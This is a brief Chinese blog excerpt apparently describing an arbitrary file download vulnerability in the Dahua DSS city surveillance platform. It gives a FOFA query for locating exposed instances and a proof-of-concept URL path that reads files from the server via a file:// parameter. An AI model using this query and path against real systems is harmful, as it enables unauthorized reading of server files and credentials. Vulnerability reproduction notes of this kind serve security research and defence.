学安全的小白

摘要： 漏洞简介 大华城市安防监控系统平台管理存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器上的任意文件 漏洞复现 fofa语法：app="dahua-DSS" 登录页面如下： POC：/portal/attachment_downloadByUrlAtt.action?filePath=file:// 阅读全文